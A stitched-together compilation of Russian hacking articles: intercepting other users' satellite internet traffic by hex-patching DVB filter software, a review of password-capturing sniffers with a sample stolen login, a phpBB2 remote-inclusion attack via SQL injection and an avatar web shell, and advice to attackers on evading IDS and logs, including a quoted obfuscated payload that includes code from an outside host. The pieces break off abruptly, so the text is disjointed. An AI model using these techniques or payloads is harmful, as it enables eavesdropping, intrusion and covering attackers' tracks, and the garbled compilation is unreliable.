Внимание! Цель данной статьи — рассмотреть возможность перехвата информации в спутниковых сетях и варианты защиты. Автор не несет ответственности за возможное применение полученной информации из статьи в противозаконных целях. Данная технология описана для общего развития, но ни как руководство к действию.
Атака

Для начала давайте разберемся, каким образом информация передается по спутниковым каналам связи. Система основана на том, что клиентский компьютер по наземным каналам связи передает запрос в дата центр на получение какой либо информации из Интернета. В датацентре запрос обрабатывается и он загружает все по тем же наземным каналам связи информацию, которую запросил клиент. Далее из датацентра информация идет на транспондер, в задачи которого входит передать информацию на спутник. Вот тут и открывается истина — задача спутника сродни задаче зеркала — просто отражать полученный сигнал — т. е. все, что приходит от транспондера спутник просто отправляет опять на землю, но уже не в виде узкого пучка, как лазер, а более расширено — как свет от фонарного столба, чем он выше — тем больше снизу световое пятно.

Что же у нас получается — спутник рассеял нашу информацию по огромной поверхности нашей планеты, как же мы ее получим?

Здесь в роль вступает DVB карточка и тарелка. Так как сигнал со спутника приходит к нам уже с довольно низким потенциалом — его необходимо усилить. Для этого нам и нужна тарелка, и чем она больше — тем лучший сигнал мы получим. Тарелка всего лишь отражает сигнал на конвертер, который уже и является непосредственно самим приемником сигнала. Но сигнал недостаточно просто принять — его надо отфильтровать. Ведь в один момент времени в сигнале может находиться информация, которую запросили, например, 100 человек. DVB карта фильтрует сигнал, полученный конвертером, и оставляет нам только то, что запросили мы и отсекает то, что запросил сосед. Как видно из всей этой цепочки — самый уязвимый элемент системы состоит в том, что данные разделяются на клиентской стороне. Вот этим мы и воспользуемся.

Что нам надо сделать для получения сторонней информации? Правильно — сделать так чтоб наша DVB карточка, фильтровала чуть-чуть не так, как задумал производитель. Фильтрация происходит по нескольким параметрам — по MAC-адресу DVB карточки или же по IP-адресу. Настройка фильтрации производится в сопутствующей программе для спутникового Интернета, например – DVBData из комплекта TTBudget-1401.

Как было уже сказано выше, непосредственно фильтрацию производит не сама карточка, а ее софт — тот самый, который мы запускаем при подключении к Интернету используя спутник. И именно его, мигающего нам зеленым цветом в трее при хорошем сигнале, мы и будем эксплуатировать (на примере DVBData от TTBudget — 1401).

После непродолжительного изучения работы и алгоритма DVBData.exe, была найдена возможность (простой заменой некоторых строк в исполняемом файле) заставить фильтр работать на нас. По умолчанию DVBData.exe не фильтрует так называемые multicast пакеты, которые рассылает провайдер спутникового Интернета. В multicast пакетах может быть и техническая информация, а может быть и программа передач. Но не столь важно, что может быть в этих multicast – главное, что фильтруются они по MAC-адресам, которые жестко прописаны в DVBData.exe. И если в самой программе изменить эти адреса – то мы заставим DVB карточку пропускать через себя абсолютно любые пакеты с произвольным MAC-адресом, вместо multicast.

Для этого откроем в любимом HEX редакторе DVBData.exe и поменяем все 10 адресов по смещению 72168h вида 01005E000008 на мак адрес карточки, информацию с которой нам надо получить. После изменения адресов сохраняем наш измененный файл под именем DVBData2.exe и копируем его в тот же каталог, что и оригинал.

И вот настал самый интересный момент — нам осталось направить нашу тарелку на тот же самый спутник, что и у нашего коллеги. Запустить наш модифицированный DVBData2.exe. И с удовольствием наблюдать, как в трее начинает мигать значок сетевого подключения — теперь информация, которую запросил наш друг, приходит и к нему и к нам!

Но что с того, что к нам приходят посторонние пакеты — мы то от этого ничего кроме загрузки процессора не получаем. Нам надо весь приходящий трафик куда-то сохранять и анализировать. Для этой цели прекрасно подходит сетевой анализатор Ethereal. В его задачи будет входить сохранение всех полученных пакетов в файл и дальнейший их анализ.

Итак, после установки запускаем наш анализатор. И активируем захват сетевого интерфейса нашей DVB карточки в меню Capture. Далее запускаем наш модифицированный DVBData2.exe. И вот они побежали — наши мегабайты информации. Стоит, пожалуй, еще напомнить, что при запуске DVBData2.exe нам нужно будет еще указать PID – это номера потоков. Их можно узнать на сайте провайдера или просто вписать все активные пиды, которые предоставит нам программа PidScanner. После непродолжительной работы всего нашего спец-софта захват можно прекратить и сохранить к себе на диск весь поток информации, который мы заполучили.

Теперь осталось в том же самом Ethereal открыть наш сохраненный поток данных. И уже не спеша, попивая чай или кофе, брать ту информацию, ради которой мы не пожалели потратить столько времени на настройку тарелки, ремонт ПО спутниковой карточки, установку Ethereal и, конечно же, на прочтение этой статьи.
Защита

Единственный способ защитится от прослушивания во время использования спутникового Интернета — шифрование всего трафика криптостойким алгоритмом. Никогда не используйте спутниковый Интернет для получения личной и особо ценной информации.

Различные вопросы и решения, которые могли возникнуть.

Вопрос: что можно перехватить таким методом?

Ответ: абсолютно весь входящий трафик. Т.е и Интернет странички, и почту, и аську, и все остальное.

Вопрос: как узнать мак адрес посторонней DVB карточки?

Ответ: для этого есть несколько способов. Первый и самый простой — просто спросить его у нашего коллеги. Если просто спросить нельзя — можно воспользоваться СИ. Ну а самый шпионский вариант – это использование спутниковых программ-граберов, например manna.

CommView — www.tamos.com
Довольно продвинутый сниффер производства TamoSoft. Можно установить свои правила на сниффинг (например игнорировать ICMP, а TCP сниффать, также кроме Internet протоколов имеется поддержка Ethernet протоколов, таких как ARP,SNMP,NOVELL и т.д.). Можно например сниффать только входящие пакеты, а остальные игнорить. Можно указать лог-файл для всех пакетов с лимитов размера в мегах. Имеет две tools’ы — Packet Generator и NIC Vendor Indentifier. Можно посмотреть все подробности посланных /полученных пакетов (например в TCP пакете можно просмотреть Source Port, Destination Port, Data length, Checksum, Sequence, Window, Ack, Flags, Urgent). Радует еще то, что она автоматически устанавливает CAPTURE драйвер. В общем тулза очень полезная для снифа, рекомендую всем.

SpyNet — packetstorm.securify.com
Довольно известный сниффер производства Laurentiu Nicula 2000:). Обычные функции — перехват/декодинг пакетов. Хотя декодинг развит прикольно (можно например по пакетам воссоздавать странички, на которых побывал юзер!). В общем на любителя:).

Analyzer — neworder.box.sk
Analyzer требует установку специального драйвера, вложенного в пакет (packet.inf, packet.sys). Можно посмотреть всю инфу о вашей сетевой карте. Также Analyzer поддерживает работу с командной строкой. Он прекрасно работает с локальной сетью. Имеет несколько утилит: ConvDump,GnuPlot,FlowsDet,Analisys Engine. Ничего выдающегося.

IRIS — www.eeye.com
IRIS продукт известной фирмы eEye. Представляет обширные возможности по фильтрации. Меня в нем сильно порадовало три фишки:
1.Protocol Distribution
2.Top hosts
3.Size Distribution
Также имеется Packet Decoder. Он поддерживает развитую систему логов. А доступные возможности фильтрации превосходят все снифферы обзора. Это Hardware Filter, который может ловить либо все пакеты (Promiscious), либо с различными ограничениями (например захватывать только multicast пакеты или broadcast пакеты, либо только Mac фреймы). Можно фильтровать по определенным MAC/IP адресам, по портам, по пакетам, содержащим определенные символы. В общем неплохой сниффак. Требует 50comupd.dll.

WinDUMP
Аналог TCPdump for Unix. Этот сниффак действует через командную строку и представляет минимальные возможности по конфигурации и еще требует библиотеку WinPcap. Мне не очень…

SniffitNT
Тоже требует WinPcap. Работа только как командной строкой, так и в интерактивном режиме. Со сложными опциями. Мне не очень.

ButtSniff
Обычный пакетный сниффер созданный известнейшей группой CDC(Cult of the Dead Cow). Фишка его в том, что его можно использовать, как плагин к BO:)(Очень полезно:)).Работа из командной строки.

Существуют еще множество снифферов, таких как NatasX, NetXRay, CooperSniffer, LanExplorer, Net Analyzer и т.д. Пойдем дальне…

Unix’овые снифферы

Все снифферы данного обзора можно найти на packetstorm.securify.com.

linsniffer
Это простой сниффер для перехвата логинов/паролей. Стандартная компиляция (gcc -o linsniffer linsniffer.c).
Логи пишет в tcp.log.

linux_sniffer
Linux_sniffer требуется тогда, когда вы хотите детально изучить сеть. Стандартная компиляция. Выдает всякую шнягу дополнительно, типа isn, ack, syn, echo_request (ping) и т.д.

Sniffit
Sniffit — продвинутая модель сниффера написанная Brecht Claerhout. Install(нужна libcap):
#./configure
#make
Теперь запускаем сниффер:
#./sniffit
usage: ./sniffit [-xdabvnN] [-P proto] [-A char] [-p port] [(-r|-R) recordfile]
[-l sniflen] [-L logparam] [-F snifdevice] [-M plugin]
[-D tty] (-t | -s) | (-i|-I) | -c]
Plugins Available:
0 — Dummy Plugin
1 — DNS Plugin

Как видите, сниффит поддерживает множество опций. Можно использовать сниффак в интерактивном режиме. Сниффит хоть и довольно полезная прога, но я ей не пользуюсь. Почему? Потому что у Sniffit большие проблемы с защитой. Для Sniffit’a уже вышли ремоутный рут и дос для линукса и дебиана! Не каждый сниффер себе такое позволяет:).

HUNT
Это мой любимый сниффак. Он очень прост в обращении, поддерживает много прикольных фишек и на данный момент не имеет проблем с безопасностью. Плюс не особо требователен к библиотекам (как например linsniffer и Linux_sniffer). Он может в реальном времени перехватывать текущие соединения и под чистую дампить с удаленного терминала. В общем, Hijack rulezzz:). Рекомендую всем для усиленного юзания:).
Install:
#make
Run:
#hunt -i [interface]

READSMB
Сниффер READSMB вырезан из LophtCrack и портирован под Unix (как ни странно:)). Readsmb перехватывает SMB пакеты.

TCPDUMP
tcpdump — довольно известный анализатор пакетов. Написанный еще более известным челом — Вэн Якобсоном, который придумал VJ-сжатие для PPP и написал прогу traceroute (и кто знает что еще?). Требует библиотеку Libpcap.
Install:
#./configure
#make
Теперь запускаем ее:
#tcpdump
tcpdump: listening on ppp0
Все твои коннекты выводит на терминал. Вот пример вывода на пинг
ftp.technotronic.com:
02:03:08.918959 195.170.212.151.1039 > 195.170.212.77.domain: 60946+ A?
ftp.technotronic.com. (38)
02:03:09.456780 195.170.212.77.domain > 195.170.212.151.1039: 60946* 1/3/3 (165)
02:03:09.459421 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:09.996780 209.100.46.7 > 195.170.212.151: icmp: echo reply
02:03:10.456864 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:10.906779 209.100.46.7 > 195.170.212.151: icmp: echo reply
02:03:11.456846 195.170.212.151 > 209.100.46.7: icmp: echo request
02:03:11.966786 209.100.46.7 > 195.170.212.151: icmp: echo reply
В общем, снифф полезен для отладки сетей, нахождения неисправностей и т.д.

Dsniff
Dsniff требует libpcap, ibnet, libnids и OpenSSH. Записывает только введенные команды, что очень удобно. Вот пример лога коннекта на unix-shells.com:

02/18/01 03:58:04 tcp my.ip.1501 -> handi4-145-253-158-170.arcor-ip.net.23
(telnet)
stalsen
asdqwe123
ls
pwd
who
last
exit

Вот dsniff перехватил логин с паролем (stalsen/asdqwe123).
Install:
#./configure
#make
#make install

Защита от снифферов

Самый верный способ защиты от снифферов — использовать ШИФРОВАНИЕ (SSH, Kerberous, VPN, S/Key, S/MIME, SHTTP, SSL и т.д.). Ну а если не охота отказываться от plain text служб и установления дополнительных пакетов:)? Тогда пора юзать антиснифферские пекеты…

AntiSniff for Windows
Этот продукт выпустила известная группа Lopht. Это был первый продукт в своем роде. AntiSniff, как сказано в описании:
«AntiSniff is a Graphical User Interface (GUI) driven tool for detecting promiscuous Network Interface Cards (NICs) on your local network segment». В общем, ловит карты в promisc режиме. Поддерживает огромное количество тестов (DNS test, ARP test, Ping Test, ICMP Time Delta Test, Echo Test, PingDrop test). Можно сканить как одну машину, так и сетку. Здесь имеется поддержка логов. AntiSniff работает на win95/98/NT/2000, хотя рекомендуемая платформа NT. Но царствование его было недолгим и уже в скором времени появился сниффер под названием AntiAntiSniffer:), написанный Майком Перри (Mike Perry) (найти его можно по адресу www.void.ru/news/9908/snoof.txt).Он основан на LinSniffer (рассмотренный далее).

Unix sniffer detect:
Сниффер можно обнаружить командой:
#ifconfig -a
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:3924 Metric:1
RX packets:2373 errors:0 dropped:0 overruns:0 frame:0
TX packets:2373 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

ppp0 Link encap:Point-to-Point Protocol
inet addr:195.170.y.x P-t-P:195.170.y.x Mask:255.255.255.255
UP POINTOPOINT PROMISC RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:3281 errors:74 dropped:0 overruns:0 frame:74
TX packets:3398 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:10

Как видите интерфейс ppp0 стоит в PROMISC mode. Либо оператор загрузил снифф для проверки сети, либо вас уже имеют… Но помните, что ifconfig можно спокойно подменить, поэтому юзайте tripwire для обнаружения изменений и всяческие проги для проверки на сниффы.

AntiSniff for Unix.
Работает на BSD, Solaris и Linux. Поддерживает ping/icmp time test, arp test, echo test, dns test, etherping test, в общем аналог AntiSniff’а для Win, только для Unix:).
Install:
#make linux-all

Sentinel
Тоже полезная прога для отлова снифферов. Поддерживает множество тестов. Проста в использовании.
Install : #make
#./sentinel
./sentinel [method] [-t ] [options]
Methods:
[ -a ARP test ]
[ -d DNS test ]
[ -i ICMP Ping Latency test ]
[ -e ICMP Etherping test ]
Options:
[ -f ]
[ -v Show version and exit ]
[ -n ]
[ -I ]

Опции настолько просты, что no comments.

MORE

Вот еще несколько утилит для проверки вашей сети(for Unix):
packetstorm.securify.com/UNIX/IDS/scanpromisc.c -ремоутный детектор PROMISC mode для ethernet карт (for red hat 5.x).
http://packetstorm.securify.com/UNIX/IDS/neped.c — Network Promiscuous Ethernet Detector (нужно libcap & Glibc).
http://packetstorm.securify.com/Exploit_Code_Archive/promisc.c -сканирует девайсы системы на детект сниффов.
http://packetstorm.securify.com/UNIX/IDS/ifstatus2.2.tar.gz — ifstatus тестит сетевые интерфейсы в PROMISC mode.

{
заголовок_HTTP_запроса (n bytes),
сигнатура «ХАКЕР» (5 bytes),
длина заголовка (2 bytes),
заголовок хакерского пакета (n bytes),
длина пакета (2 bytes),
данные (n byte);
}

При нахождении такового пакета из его хакерского заголовка вытаскиваются необходимые поля (например имя передаваемого файла и номер передаваемого куска) и сами данные. Вуаля! Данные у хакера, а за входящий трафик платит хозяин MyHOST…

Теперь встает вопрос «Как от этого защищаться».

Если учесть, что длина Ethernet-пакета не зависит от того, сколько байт из него будет принято сервисом на машине-получателе, то ограничением длинны принимаемого TCP-запроса мы ничего не добьемся. Огромное количество открытых для всех proxy-серверов говорит о том, что наш непосредственный провайдер не сможет их все зафильтровать.

Итого вывод — что бы такого не приключилось надо менять концентратор здания (тот самый хаб) на коммутатор (свич) и молить Аллаха, чтобы наш хакер не знал как этот свич обмануть (что возможно).

PS: Вышеописаный метод был проверен лично мной — работает

PPS: Может подарить моему провайдеру свич?

Поискав require и include во всех исходниках форума я нашел подключения различных файлов. Много подключений однотипных, например подключается файл так «$phpbb_root_path . ‘includes/functions_validate.’.$phpEx», т.е. указание на директорию, которая в зависимости от расположения подключающего файла меняется, затем точное указание на файл, добавление к нему расширения. Скорее всего $phpbb_root_path создана для удобной возможности перемещения файла из одного каталога в другой, и изменение этой переменной позволит легко переопределить пути подключения файла. Изменение этой переменной привело бы к возможности удаленного инклюда. $phpEx определяет расширение PHP скриптов, связано это с тем, что WWW сервис определяет PHP скрипт по его расширению. На некоторых серверах возможны такие варианты как «php3″,»php5″,»phtml».
Итак, что же сделано для того чтобы никто не смог переписать эти переменные? В файлах, где переменная «$phpbb_root_path»и «$phpEx» не задается явно, стоит проверка определена ли константа IN_PHPBB, если нет, то скрипт умирает сообщая «Hacking attempt». В файлах, где определяется эта константа, в самом начале определяются и эти две переменные $phpbb_root_path и $phpEx. Изменить эти переменные можно только если register_globals включен (по умолчанию он выключен), и программист забыл поставить проверку константы. Архитектурно неверно использовать подобные приемы, лучше всего жестко определять пути для подключаемых файлов, либо для определения пути использовать константы. Так же лучше всего определить фиксированное расширение для подключаемых файлов и выделить для них отдельный каталог, закрытый, например, с помощью .htaccess, от передачи оттуда файлов . Хотя такие решения с переменными дают возможность использовать данное приложение на различных WWW сервисах.
Из друг на друга похожих икнлюдов выделяются и интересуют нас следующие:

в файле admin/admin_styles.php
$phpbb_root_path. «templates/» . basename($install_to) . «/theme_info.cfg»
$phpbb_root_path. «templates/» . $sub_dir . «/theme_info.cfg»
в файле index.php
‘./’ . $file
в файле faq.php
$phpbb_root_path . ‘language/lang_’ . $board_config['default_lang'] . ‘/’
. $lang_file . ‘.’ . $phpEx

в файле includes/functions.php
function init_userprefs — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’ . $phpEx
function init_userprefs — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_admin.’ . $phpEx
function setup_style — $phpbb_root_path . $template_path . $template_name
. ‘/’. $template_name . ‘.cfg’
function message_die — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’.$phpEx

Файл admin/admin_styles.php
include($phpbb_root_path. «templates/» . basename($install_to)
. «/theme_info.cfg»);
Переменная install_to берется из запроса GET или POST в чистом виде, что может привести к передаче в эту переменную любой информации. Переменная обрабатывается функцией «basenamе()» и поэтому данные вида «/../../myScriptName» обрежутся до «myScriptName». Но можно передать строку «myScript\x0″ и тогда из папки templates подключится файл «myScript» , либо передать «..» и тогда если в корне форума существует theme_info.cfg, он подключится. Если его нет, то будет ошибка.
Стоит добавить проверки, которые поставлены в рассматриваемом далее инклюде, он так же находится в этом файле
. include($phpbb_root_path. «templates/» . $sub_dir
. «/theme_info.cfg»);
Расположенный вне проверок такой вызов функции позволил бы, передав в $sub_dir данные, запустить скрипт загруженный как аватар. В итоге полученная строка, переданная в include, выглядела бы так
./../templates/../images/avatars/shell.jpg\x0/theme_info.cfg
Но $sub_dir переменная, в которую поочередно передаются имена файлов и папок из каталога «./../templates/», значит возможность передать спецсимволы исключена.Дальше идет проверка того, что бы переменная не являлась файлом или ссылкой, не была бы равна «.», «..» и, как нестранно, «CVS». После такой проверки, $sub_dir однозначно будет каталогом. Последняя проверка устанавливает факт существования «theme_info.cfg». В итоге проникнуть можно либо создав свой каталог и поместив «theme_info.cfg», либо изменить существующий «theme_info.cfg».
В исходнике admin/index.php был найден такой инклюд «include(‘./’ . $file);». Выглядит инклюд очень заманчиво, но передать в него любые данные не получится, поскольку в $file, передаются имена файлов и каталогов из «admin/». А затем происходит проверка preg_match(«/^admin_.*?\.» . $phpEx . «$/», $file). Рассмотри алгоритм проверки: первым проверяется наличие в начале строки admin_, дальше может идти любое значение, заканчиваться строка должна .php. Действительно, «^» означает начало строки в которой осуществляется поиск и за началом следует «admin_», отсутсвие утверждения о начале, приведет к тому, что «admin_» сможет находится везде, что приведет к подключению файла с именем «mySTRING_admin_.php». «$» утверждает об окончании строки (или множества строк). На конце строки должен находится php. Без данного утверждения preg_match возвращал бы true даже в том случае, если имя файла было бы «admin_.php.mySTRING» . В принципе, существование директории «admin_.php» вызовет ошибку в работе скрипта. Можно было бы, добавить проверку на не директорию и не ссылку. Так как единственная возможность выполнить include с вредоносным кодом это записать этот файл в директорию «phpBB2/admin», то я думаю следует ограничить эту директорию правами только чтение и запуск.
Так же в «faq.php» замечен интересный инклюд
include($phpbb_root_path . ‘language/lang_’ . $board_config['default_lang']
. ‘/’ . $lang_file . ‘.’ . $phpEx);
$lang_file определятся однозначно либо как lang_bbcode, либо lang_faq . Остается переменная $board_config['default_lang']. Нужно проверить существует ли возможность ее перезаписи.
В common.php так определяется $board_config:
$sql = «SELECT *
FROM » . CONFIG_TABLE;
if( !($result = $db->sql_query($sql)) )
{
message_die(CRITICAL_ERROR, «Could not query config information»
, «», __LINE__, __FILE__, $sql);
}

while ( $row = $db->sql_fetchrow($result) )
{
$board_config[$row['config_name']] = $row['config_value'];
}
То есть, если существует возможность SQL инъекции, то нападающий сможет изменить значение в таблице, тем самым установив значение $board_config['default_lang'], например, на файл аватара. Скрипт faq.php обламывает такие попытки функцией init_userprefs (includes/functions.php). В этой фунции есть проверка basename’ом. В связи с тем, что basename отсечет все попытки прорваться в другие каталоги с помощью конструкций вида /../../, то можно указать на файл находящийся в language и начинающийся lang_ и заканчивающийся «\x0″.
Как говорилось выше в функции init_userprefs происходит вызов basename($board_config['default_lang']), затем полученный результат передается в $default_lang, проверяется наличие файла для инклюда, если файл не существует, то $default_lang становится равным «english». А перед вызовом include, $board_config['default_lang'] приравнивается $default_lang. В функции setup_style есть вот такое подключение файла
($phpbb_root_path . $template_path
. $template_name . ‘/’ . $template_name . ‘.cfg’)
«$template_path» определяется как ‘templates/’ и с этим ничего нельзя сделать, но остается «$template_name». В «$template_name» передаются данные из SQL запроса $row['template_name']. Значит при осуществлении SQL инъекции можно будет передать сюда все, что угодно. После инициализации переменной «$template_name» происходит вызов функции из класса Template, параметры, которые в неё передаются — ($phpbb_root_path . $template_path . $template_name). Затем проверяется значение, которое возвратила функция, а она возвращает ID объекта. И если посмотреть на функцию, то видно, что ей безразлично какие параметры передаются. А потому проверка расположенная перед инклюдом проходится спокойно. Создайте файл hack.php в папке includes и поместите туда такой код:

Видим, что оболочка, загруженная под видом аватара, запускается. Теперь найдем вызов функции «setup_style» в функции «init_userprefs», так как я использовал установленный без различных модификаций и стилей форум, то я перед вызовом setup_style($board_config['default_style']) ставлю echo $board_config['default_style']; и получаю 1. Просмотрев SQL запрос на получение данных составляем запрос, который должен быть осуществлен за счет SQL инъекции «UPDATE phpbb_themes SET template_name=/’../images/avatars/shell.jpg\x0′ WHERE themes_id = 1;
Инзменив таким образом $template_name мы получаем возможность загрузить вместо стиля по умолчанию наш скрипт, загруженный как аватар. Данная уязвимость работает (скорее всего) на всех версиях phpBB2 (я проверил на последней 2.0.21 и 2.0.10). Внеся такие изменения попробуйте теперь загрузить главную страницу и вы получите запуск «shell.jpg».

Осталась функция message_die
function message_die — $phpbb_root_path . ‘language/lang_’
. $board_config['default_lang'] . ‘/lang_main.’.$phpEx
Известно, что $board_config['default_lang'] в функции не изменяется, что можно переписать эту переменную SQL инъекцией. Задача найти вызов функции, где перед ее вызовом не объявляется константа HEADER_INC и первым параметром не передается CRITICAL_ERROR, а так же не вызывается перед message_die функция init_userprefs.
И это уже задача, твоя, читатель

Для начала давайте рассмотрим сканнер безопасности XSpider. Безусловно, это лидер на рынке сканнеров безопасности. Но он создан именно для “открытого” сканирования. Самые первые следы могут быть найдены уже при начале сканирования – первым производится сканирование портов. Оно производится в большое количество потоков, поэтому легко обнаружается файрволом, соответственно администратор может с лёгкостью обнаружить в лог-файлах файрвола Ваш IP. Но это ещё пол беды. Максимум что Вам могут сделать за сканирование – предупредить, либо в будущем отфильтровывать все запросы с Вашего IP-адреса (бан по IP).

Идём дальше – XSpider, при обнаружения какой либо службы, в которой присутствует авторизация (Telnet, FTP, POP3 и т.д.), начинает подбирать к ней пароль, что тоже чревато последствиями. По большому счёту при подборе пароля есть 2 варианта развития событий:

1. Таймаут
2. Занесение попыток в логи

При первом варианте сервис обнаружает подбор пароля и на все, даже правильные, попытки авторизации начинает отказывать Вам в доступе. Соответственно администратору сообщается об этом.

При втором же варианте в логах появляется несколько сотен, а то и тысяч, строчек с попытками неверной авторизации, с промежутком в доли секунд, что явно указывает на подбор пароля. Это относится не только к XSpider, но и ко всем брутерам типа Brutus, Hydra и т.д..

Вот здесь есть лог ftp-сервера к которому я подбирал пароль с помощью Brutus-AET2. При подборе использовались словари которые идут в комплекте с Brutus-AET2. (users.txt,words.txt). Подбор только по этим словарям добавил в логи ровно 1000 строчек. Тот же XSpider имеет словари которые больше в тысячи раз.

Далее проходит анализ веб-контента и CGI-сканирование. Анализ веб-контента страшен тем, что сканнер начинает обнаружать уязвимостями самыми пресловутыми способами – подставляя в параметры кавычки, AND 1=1/*, всяческие теги в поля для ввода и т.д. Любая IDS сразу начнёт визжать и выдаст огромный список попыток атак. Конечно, Вы можете сказать – “там же есть галочка “Маскировать от IDS””. Хочу Вас огорчить – эта галочка практически ничего не значит, более-менее нормально настроенная IDS всё равно обнаружит попытки атак. К тому же, даже если IDS не имеется, Вы загадите логи так, что любой Вася из 9 класса, за шоколадку держащий сервер, обнаружит факт CGI-сканирования.

Для того, что бы больше Вас убедить я просканировал свой веб-сервер XSpider`ом используя профиль HTTPAll, предварительно вычистив у веб-сервера все логии полностью. После CGI-сканирования логи стали весить 642(!) кб. Лог заполненный результатами работы XSpider Вы так же можете посмотреть здесь.
Вот небольшой кусок из этого лога:

172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /nkpyuetjqhiarwwk.htm HTTP/1.1″ 400
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET / HTTP/1.1″ 302
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /https-admserv/bin/index HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:12 +0300] «GET /Admin.po?proceed=yes HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /Admin/index.jsp HTTP/1.1″ 200
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /std.html HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /servlet/ServletManager HTTP/1.1″ 404
172.17.11.142 — - [21/Jan/2007:13:29:13 +0300] «GET /admin/contextAdmin/contextList.jsp HTTP/1.1″ 200
172.17.11.142 — - [21/Jan/2007:13:29:14 +0300] «GET / HTTP/1.1″ 302
172.17.11.142 — - [21/Jan/2007:13:29:14 +0300] «PUT /PTNSSnnxam.txt HTTP/1.1″ 405

Как видите – первые 4 запроса сделаны в 13:29:12 – 100% cgi-сканирование.
Причём сканирование идёт со скоростью 4 запроса в секунду. На такую скорость сработает любая IDS. Ну и конечно же стоит упомянуть о том, что XSpider добавил своим сканированием 7068 строчек в лог-файл. Если Вы будете сканировать дохлый сайт какой ни будь компании, который посещают человека 2-3 в неделю (и то по ошибке), то Вы явно нарвётесь на неприятности. Самое лучшее, что можно сделать – сканировать/подбирать пароль через прокси. И то если Вы это сделаете, то будьте на 80% уверенны в том, что после Ваших действий Вас на той стороне уже будут ждать, а возможно и поменяют все пароли.
Далее по списку (если используется профиль Default) идёт поиск уязвимостей в остальных сервисах – удалённые переполнения буфера, DoS и т.д.. И мало кто из начинающих читает предупреждения или Help сканнера. Вот вырезка из справки XSpider – “Иногда, при плохом качестве связи с проверяемым хостом возможно ложное определение DoS-уязвимости (когда связь с хостом прервалась случайно, а XSpider сделал вывод, что прошла DoS-атака).” – отсюда делаем вывод — если DoS-атака пройдёт, то сервер реально может откинуться, но если верить той же справке, то такое происходит в 40% случаев. Обратите внимание ещё на то, что при настраивании профиля там ясно указывается — обнаружение некоторых уязвимостей может плохо кончится для сервера.
Ну, думаю что со сканнерами и с брутерами всё понятно. Давайте теперь перейдём к эксплойтам. Вы наверное ни раз уже пользовались ими. Но хоть один из Вас задумывался как они работают? Что они делают? Какие следы могут оставить? Я думаю что 70% читателей скажут “Нет”.
Большой популярностью (по мнению автора) пользуются эксплойты к форумам. Как Вы наверное уже знаете – на большинстве форумов распознавание пользователей происходит с помощью сессий. Имена сессий представляют из себя обычный набор букв и цифр – никаких посторонних или опасных знаков. Каждый кто заходит на форум получает сессию даже если он не авторизирован. Вот пример обычного имени сессии:
ab7bfc3f886270fd339dcce652fed1eb
А в эксплойте для ipb2.1.6 от RST как имя сессии передаётся строка ipb216_for_IDS. Так же, в каком-то эксплойте, (точно уже не помню) имя сессии было IDS_i_am_exploit. И таких примеров множество. Если Вы хотя бы немного знаете об IDS, то Вы наверное в курсе того что базы IDS часто обновляются, соответственно в них есть записи о том как распознать эксплоит.
Конечно же, IDS стоят не на всех веб-серверах, но это не спасёт Вас от вычисления в ~60% случаях использования эксплойтов. Возьмём, к примеру, эксплоит для IPB 2.1.5 от RST, который выполнял произвольные команды. Он создаёт топик называющийся justxpl, с примечанием justxpl justxpl. Топик содержит следующий текст:
r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116). chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100). chr(46).chr(114).chr(117).chr(47).chr(114).chr(53) .chr(55).chr(105). chr(112).chr(98). chr(105).chr(110).chr(99). chr(46). chr(116).chr(120).chr(116)))

Грамотный администратор сразу же поймёт в чём дело, а Вы лишний раз засветитесь.
Вот вырезка из жалобы одного администратора провайдеру:
“попытки взлома форума продолжаются – на этой неделе опять были созданы темы «justxpl». Автор лазит через прокси.”
А эксплойты для удалённого переполнения буфера или повышения привилегий вообще не стоит использовать предварительно не проверив их работу хотя бы на виртуальной машине. Данные типы эксплойтов опасны тем, что могут делать далеко не то что обещают. В эксплойте может существовать и защита от дурака. Я слышал о множестве случаев когда запускали эксплоит, который (как в комментариях писалось) через уязвимость в определённом сервисе давал атакующему командную строку с привилегиями администратора, а получали полное вырубание сервиса или DoS всей машины.
Эксплойты для поднятия привилегий через уязвимость в ядре вообще могут грохнуть ОС так, что придётся переустанавливать. А подумайте сами – за что дадут больше сроку: за то что Вы просто получили командную строку или за то что Вы убили ядро ОС и вывели сервер из рабочего состояния?
Надеюсь после прочтения данной статьи многие задумаются и начнут перед атаками тестировать эксплойты на виртуальных машинах или локальном веб-сервере.

1. Безобразие начинается
2. Подопотные
3. Обещания разработчиков
4. Флудим
5. SYN
- ICMP
- IGMP
- UDP
6. Нюкаем
7. Эксплоиты
8. Прослушиваем
9. Сканим
10. Отключаем
11. Кто здесь Лидер?

Посмотрим же как реализуют себя стенки в защите вашего любимого компа. Сейчас мы будем их жестоко тестить на предмет противодействия различным видам сетевых атак. Выясним же, кто действительно стоит того, чтобы занимать достойное место в системе, защищая её от всяческих напастей; а кто — разрекламированный друшлаг.

Заниматься мы будем простейшим и в то же время важнейшим делом — валить систему в синий экран всеми доступнымии способами. Вот щас и выясним — кто тут лидер ))).

А если говорить интелегентно — мы будем испытывать фаерволы на предмет противодействия атакам, вызывающим отказ в обслуживании,.. и не только.
Предполагается начальные знания читателя основы ТСР\!Р протокола, а также некоторого хакерского опыта smile.gif .

Итак, мы имеем:

1. Винда ХРеновая\SamPostavil_2, пропатченная под завязку.
2. Фаерволы популярные:
- Kaspersky AntiHacker v.1.7.130
- OutpostPro_v3.0.543.431 RUS Final
- ZoneAlarm_PRO_60.667
